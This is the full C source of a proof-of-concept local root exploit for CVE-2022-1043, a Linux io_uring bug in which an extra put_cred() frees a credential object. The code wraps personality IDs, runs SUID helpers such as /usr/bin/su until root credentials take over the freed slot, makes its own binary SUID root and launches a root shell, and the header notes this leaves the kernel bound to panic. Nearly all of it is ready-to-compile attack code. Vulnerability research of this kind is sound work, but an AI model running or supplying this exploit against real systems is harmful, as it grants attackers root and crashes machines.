/* PoC for CVE-2022-1043, a bug in io_uring leading to an additional put_cred()
 * that can be exploited to hijack credentials of other processes.
 *
 * We spawn SUID programs to get the free'd cred object reallocated by a
 * privileged process and abuse them to create a SUID root binary ourselves
 * that'll pop a shell.
 *
 * The dangling cred pointer will, however, lead to a kernel panic as soon as
 * the task terminates and its credentials are destroyed. We therefore detach
 * from the controlling terminal, block all signals and rest in silence until
 * the system shuts down and we get killed hard, just to cry in vain, seeing
 * the kernel collapse.
 *
 * The bug affected kernels from v5.12-rc3 to v5.14-rc7 and has been fixed by
 * commit a30f895ad323 ("io_uring: fix xa_alloc_cycle() error return value
 * check").
 *
 * user@box:~$ gcc -pthread cve-2022-1043.c -o cve-2022-1043
 * user@box:~$ ./cve-2022-1043
 * [~] forking helper process...
 * [~] creating worker threads...
 * [~] ID wrapped after 65536 allocation attempts! (id = 1)
 * [~] ID wrapped again after 131071 allocation attempts! (id = 1)
 * [~] waiting for creds to get reallocated...
 * [.] reused by uninteresting EUID -16843010 (PaX MEMORY_SANITIZE?)
 * [.] reused by uninteresting EUID 1000
 * [*] waiting for root shell...
 * # id
 * uid=0(root) gid=0(root) groups=0(root),1000(user)
 *
 * (c) 2022 Open Source Security, Inc.
 *
 * - minipli
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 */

#define _GNU_SOURCE
#include <linux/io_uring.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <pthread.h>
#include <unistd.h>
#include <limits.h>
#include <signal.h>
#include <stdbool.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sched.h>
#include <stdio.h>
#include <fcntl.h>

#define MEM_SANITIZE_UID	((uid_t)0xfefefefefefefefe)
#define IORING_ID_MAX		USHRT_MAX

#if 0
#define SUID_HELPER	"/bin/passwd", "-S"
#else
#define SUID_HELPER	"/usr/bin/su"	/* noisier, but faster! */
#endif
#define NUM_PROCS	10

extern char **environ;

static struct shmem { volatile int check; } *shmem;
static int process_pipes[2][2] = { { -1, -1 }, { -1, -1 } };
static int thread_pipe[2] = { -1, -1 };
static __thread bool allowed_to_die = true;
static int fd = -1;

#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup		425
#endif
static int io_uring_setup(unsigned int entries, struct io_uring_params *p)
{
	return syscall(__NR_io_uring_setup, entries, p);
}

#ifndef __NR_io_uring_register
#define __NR_io_uring_register	427
#endif
static int io_uring_register(int fd, unsigned int oc, void *arg,
                             unsigned int nr_args)
{
	return syscall(__NR_io_uring_register, fd, oc, arg, nr_args);
}

static void zombify(int closefds) {
	sigset_t set;

	sigfillset(&set);
	sigprocmask(SIG_BLOCK, &set, NULL);

	if (closefds) {
		close(process_pipes[0][0]);
		close(process_pipes[0][1]);
		close(process_pipes[1][0]);
		close(process_pipes[1][1]);
		close(thread_pipe[0]);
		close(thread_pipe[1]);
		close(0);
		close(1);
		close(2);
	}

	for (;;)
		pause();
}

#define _msg(e, fmt,...) msg(e, fmt "\n", ##__VA_ARGS__)
#define die(fmt,...)	_msg(1, "[!] " fmt, ##__VA_ARGS__)
#define err(fmt,...)	_msg(1, "[!] " fmt ": %m", ##__VA_ARGS__)
#define warn(fmt,...)	_msg(0, "[-] " fmt, ##__VA_ARGS__)
#define info(fmt,...)	_msg(0, "[~] " fmt, ##__VA_ARGS__)
#define info2(fmt,...)	_msg(0, "[.] " fmt, ##__VA_ARGS__)
#define info3(fmt,...)	_msg(0, "[*] " fmt, ##__VA_ARGS__)

static void msg(int die, const char *fmt,...) __attribute__((format(printf,2,3)));
static void msg(int die, const char *fmt,...) {
	va_list va;

	va_start(va, fmt);
	vprintf(fmt, va);
	va_end(va);

	if (die) {
		if (!allowed_to_die) {
			warn("not allowed to die, zombie time!");
			zombify(1);
		} else
			exit(1);
	}
}

static bool pin_cpu(int cpu) {
	cpu_set_t cpus;

	CPU_ZERO(&cpus);
	CPU_SET(cpu, &cpus);

	return !!sched_setaffinity(0, sizeof(cpus), &cpus);
}

static bool is_suid(const char *path) {
	struct stat buf;

	if (stat(path, &buf))
		return false;

	return buf.st_uid == 0 && (buf.st_mode & 04111) == 04111;
}

static void *do_trigger(void *arg) {
	uid_t uid, last_uid;
	int last, ret, i;
	int wrapped;

	/* Plan:
	 * - setuid(getuid()) to get some fresh unshared creds
	 * - register/unregister loop until ID wrapped twice (and cred put)
	 * - switch CPU and signal helper to unregister and do the final put of our
	 *   creds to avoid hitting sanity checks in __put_cred()
	 * - wait until cred got reallocated by a privileged process
	 * - pin hijacked cred by registering once more
	 * - abuse creds to make /proc/self/exe SUID root
	 * - rest in silence
	 */

	/* Get a fresh cred object */
	uid = getuid();
	if (setuid(uid))
		err("%s: setuid(%d)", __func__, uid);

	/* Trigger bug by making the ID wrap */
	wrapped = 0;
	ret = last = -1;
	for (i = 0; i < 2 * IORING_ID_MAX + 1; i++) {
		ret = io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0);
		if (ret < 0) {
			err("%s: io_uring_register(IORING_REGISTER_PERSONALITY) # %d",
			    __func__, i);
		}

		if (last < ret)
			last = ret;

		if (ret < last) {
			info("ID wrapped%s after %d allocation attempts! (id = %d)",
			     wrapped ? " again" : "", i+1, ret);

			/* We do the first put ourselves, only the final one needs to be
			 * done by a different task.
			 */
			wrapped++;
			if (wrapped == 2)
				break;

			last = ret;
		}

		if (io_uring_register(fd, IORING_UNREGISTER_PERSONALITY, NULL, ret)) {
			err("%s: io_uring_register(IORING_UNREGISTER_PERSONALITY, %d)",
			    __func__, ret);
		}
	}

	/* If we triggered the bug, we have no valid creds any more, we're not
	 * allowed to terminate!
	 */
	if (wrapped)
		allowed_to_die = false;

	if (wrapped < 2) {
		die("IDs didn't wrap%s after %d allocation attempts?!?",
		    wrapped ? " often enough" : "", i);
	}

	/* Switch CPUs to not trip the checks in __put_cred() about destroying our
	 * own creds via the RCU worker.
	 */
	if (pin_cpu(1))
		err("%s: failed to pin to CPU #%d", __func__, 1);

	/* Signal helper to unregister */
	if (write(thread_pipe[1], &ret, sizeof(ret)) < (int)sizeof(ret))
		err("%s: failed to signal helper thread", __func__);

	/* Wait for creds to be reallocated by a privileged process */
	info("waiting for creds to get reallocated...");

	last_uid = uid;
	for (;;) {
		static int print_limit = 5;
		uid_t new_uid;
		char ch;

		/* Wait for a flock of root creds getting allocated */
		while (!shmem->check)
			usleep(1);

		/* Non-faulting sanity checks first */
		if (prctl(PR_GET_SECUREBITS, 0, 0, 0, 0) != 0)
			goto next_batch;

		for (i = 0; i < 40; i++) {
			if (prctl(PR_CAPBSET_READ, i, 0, 0, 0) != 1)
				goto next_batch;
		}

		/* Check EUID, as we're spawning SUID processes */
		new_uid = geteuid();
		if (new_uid == 0)
			break;

		/* Show some progress along the way... */
		if (new_uid != last_uid && print_limit) {
			bool mem_sanititze = new_uid == MEM_SANITIZE_UID;

			info2("reused by uninteresting EUID %d%s", new_uid,
			      mem_sanititze ? " (PaX MEMORY_SANITIZE?)" : "");

			print_limit--;
			if (print_limit == 0)
				info("muting further changes, waiting for root creds!");
		}

		last_uid = new_uid;

next_batch:	/* Reap the zombies and try again */
		shmem->check = 0;
	}

	/* Prevent the hijacked creds from vanishing under us by grabbing another
	 * reference.
	 */
	ret = io_uring_register(fd, IORING_REGISTER_PERSONALITY, NULL, 0);
	if (ret < 0)
		err("%s: io_uring_register(IORING_REGISTER_PERSONALITY) for foreign cred pinning",
		    __func__);

	/* Give any possibly pending LSM setup time to finish. */
	usleep(250 * 1000);

	/* Make this binary SUID root */
	if (chown("/proc/self/exe", 0, (gid_t)-1))
		err("chown() failed! bad creds?");

	if (chmod("/proc/self/exe", 04755))
		err("chmod() failed! bad creds?");

	info3("waiting for root shell...");

	/* Let the spawner reap the zombies and spawn our shell. */
	shmem->check = 0;

	zombify(1);

	return arg;
}

static void *do_unregister(void *arg) {
	int id;

	/* Wait for do_trigger() to align the stars^Wcreds */
	switch (read(thread_pipe[0], &id, sizeof(id))) {
		case sizeof(id):
			break;
		case 0:
			return arg;
		default:
			err("%s: read()", __func__);
	}

	/* Final put_cred() for the other thread's creds */
	if (io_uring_register(fd, IORING_UNREGISTER_PERSONALITY, NULL, id)) {
		err("%s: io_uring_register(IORING_UNREGISTER_PERSONALITY, %d)",
		    __func__, id);
	}

	/* Let the SUID spawner know we're ready */
	if (write(process_pipes[0][1], "1", 1) <= 0)
		err("%s: write(pipe)", __func__);

	return arg;
}

static void suid_spawner(int pipe_rd, int pipe_wr) {
	char *argv[] = { SUID_HELPER, NULL };
	int procs = 0;
	char ch;

	shmem->check = 0;

	if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) < 0)
		err("%s: prctl(PR_SET_PDEATHSIG)", __func__);

	/* Signal we're ready */
	if (write(pipe_wr, "1", 1) <= 0)
		err("%s: write(pipe)", __func__);

	/* Wait for the trigger */
	if (read(pipe_rd, &ch, sizeof(ch)) <= 0)
		err("%s: read(pipe)", __func__);

	for (;;) {
		/* Break as soon as we were able to exploit the hijacked privs */
		if (is_suid("/proc/self/exe")) {
			while (procs--)
				wait(NULL);

			execve("/proc/self/exe", (char *const []){ argv[0], NULL }, environ);
			err("%s: exec(self)", __func__);
		}

		switch (fork()) {
			case -1:
				usleep(1);
				break;
			case 0:
				/* Ensure the forked helper stays silent */
				close(0); close(1); close(2);
				execve(argv[0], argv, environ);
				exit(1);
			default:
				procs++;
		}

		if (procs >= NUM_PROCS) {
			/* Sync with do_trigger() before reaping processes */
			shmem->check = 1;
			while (shmem->check)
				usleep(1);
			if (wait(NULL) > 0)
				procs--;
			while (waitpid(-1, NULL, WNOHANG) > 0)
				procs--;
		}
	}
}

static int child(void) {
	struct io_uring_params p = { };
	pthread_t threads[2];

	if (daemon(1, 1))
		err("parent: daemon()");

	fd = io_uring_setup(1, &p);
	if (fd < 0)
		err("parent: io_uring_setup()");

	info("creating worker threads...");
	if (pipe(thread_pipe))
		err("parent: pipe()");

	if (pthread_create(&threads[0], NULL, do_trigger, NULL) ||
	    pthread_create(&threads[1], NULL, do_unregister, NULL))
		err("pthread_create()");

	pthread_join(threads[1], NULL);
	/* do_trigger() zombifies itself, no need to wait for it */
	zombify(0);

	return 1;
}

int main(int argc, char *argv[]) {
	pid_t pid;
	char ch;

	if (!getuid())
		die("ahem...");

	/* Fast lane for the SUID path */
	if (!geteuid()) {

		if (setuid(0) || setgid(0))
			err("set*id(0)");

		execve(argv[0], argv, NULL);
		err("execve('%s') failed", argv[0]);
	}

	/* Ensure all tasks start on the same CPU to share SLUB's partial slabs */
	if (pin_cpu(0))
		err("failed to pin to CPU #%d", 0);

	info("forking helper process...");
	if (pipe(process_pipes[0]) < 0 || pipe(process_pipes[1]) < 0)
		err("pipe()");

	shmem = mmap(NULL, sysconf(_SC_PAGESIZE), PROT_READ | PROT_WRITE,
	             MAP_ANONYMOUS | MAP_SHARED, -1, 0);
	if (shmem == MAP_FAILED)
		err("mmap(shmem");

	pid = fork();
	switch (pid) {
		case  0: suid_spawner(process_pipes[0][0], process_pipes[1][1]);
		         /* fall-through -- not! */
		case -1: err("fork()");
	}

	/* Wait till the child is ready to ensure proper process reaping */
	if (read(process_pipes[1][0], &ch, sizeof(ch)) <= 0)
		err("parent: read(pipe)");

	/* Detach from the controlling terminal, we might need to sleep forever */
	switch (fork()) {
		int status;
		default: wait(&status); break;
		case -1: err("fork()"); break;
		case  0: exit(child());
	}

	/* Wait for the SUID spawner to finish */
	waitpid(pid, NULL, 0);

	return 0;
}